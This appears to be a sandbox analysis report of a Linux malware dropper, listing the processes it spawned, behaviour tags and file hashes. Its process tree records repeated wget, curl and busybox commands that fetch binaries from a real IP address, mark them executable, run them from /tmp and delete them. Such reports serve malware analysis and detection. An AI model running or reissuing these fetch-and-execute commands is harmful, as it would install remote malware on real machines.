/usr/bin/curlcurl -O http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:932
-
-
/bin/chmodchmod 777 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9./ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:938
-
-
/bin/chmodchmod 777 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8./bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:944
-
-
/bin/chmodchmod 777 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq./2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:950
-
-
/bin/chmodchmod 777 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq./31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:956
-
-
/bin/chmodchmod 777 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z./PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:962
-
-
/bin/chmodchmod 777 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y./cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:968
-
-
/bin/chmodchmod 777 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU./454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:971
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97